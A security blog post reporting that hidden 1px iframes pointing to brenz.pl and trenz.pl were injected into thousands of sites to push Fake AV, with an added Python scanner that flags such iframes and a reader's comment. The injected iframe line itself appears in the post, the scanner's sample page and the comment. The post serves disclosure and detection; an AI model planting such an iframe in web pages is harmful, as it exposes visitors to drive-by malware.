Brenz.pl is Back With Malicious iFrames

We used to see brenz.pl being used to distribute malware back in 2009, and it got shut down. However, over the last few weeks we have noticed a big increase in the number of sites infected with iframes pointing to it.

All the infected sites have this iframe (or one very similar):

<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 wid..

This iframe redirects the user to other sites to download the infamous Fake AV. How many sites got infected? According to Google, at least 2 thousand sites got hacked in the last 90 days:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1932 domain(s), including luragung.web.id/, computing.net/, puntlandpost.com/.

And under the same “management”, there is a domain called trenz.pl, which infected more than 1k sites:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 826 domain(s), including rs.gov.br/, darululoom-deoband.com/, upi.edu/.

Both sites are hosted on 91.188.59.197. So, one more IP address to block in your firewalls 🙂
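
To check your own pages for the injection described above, here is an added example (not part of the original post) that parses HTML and reports iframes whose host is brenz.pl or trenz.pl. It goes one step beyond the post by also flagging any 0-1px iframe with an absolute URL, to cover the "very similar" variants; the function names and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains named in the post; subdomains such as www. also match.
BAD_DOMAINS = ("brenz.pl", "trenz.pl")

# Constructed sample page: one injected frame as in the post, one normal embed.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
<iframe src="https://video.example.com/embed/1" width="560" height="315"></iframe>
</body></html>"""

def host_of(url):
    """Lower-cased host of an absolute or protocol-relative URL, else ''."""
    try:
        return (urlsplit(url.strip()).hostname or "").lower().rstrip(".")
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return ""

def is_tiny(attrs):
    """True if width/height (attribute or inline style) is 0 or 1 pixel."""
    dims = [attrs.get("width") or "", attrs.get("height") or ""]
    dims += re.findall(r"(?<![-\w])(?:width|height)\s*:\s*([^;]+)", attrs.get("style") or "", re.I)
    return any(re.fullmatch(r"\s*[01](px)?\s*", d, re.I) for d in dims)

class IframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # tuples of (line number, reason, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        host = host_of(src)
        if any(host == d or host.endswith("." + d) for d in BAD_DOMAINS):
            self.findings.append((self.getpos()[0], "known-bad host", src))
        elif host and is_tiny(a):
            self.findings.append((self.getpos()[0], "tiny iframe, absolute URL", src))

def scan_html(text):
    """Return findings for one HTML document given as a string."""
    scanner = IframeScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings
```

The second rule is a heuristic and can flag legitimate tracking frames, so review those hits by hand rather than deleting them automatically.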



2 comments
  1. Why is it that on my computer, running Windows XP, every time I save an .html file and reopen it, I see this written at the bottom in my Notepad: <iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1 ????? My computer is infected too!!!??? And for a start there is no network?????
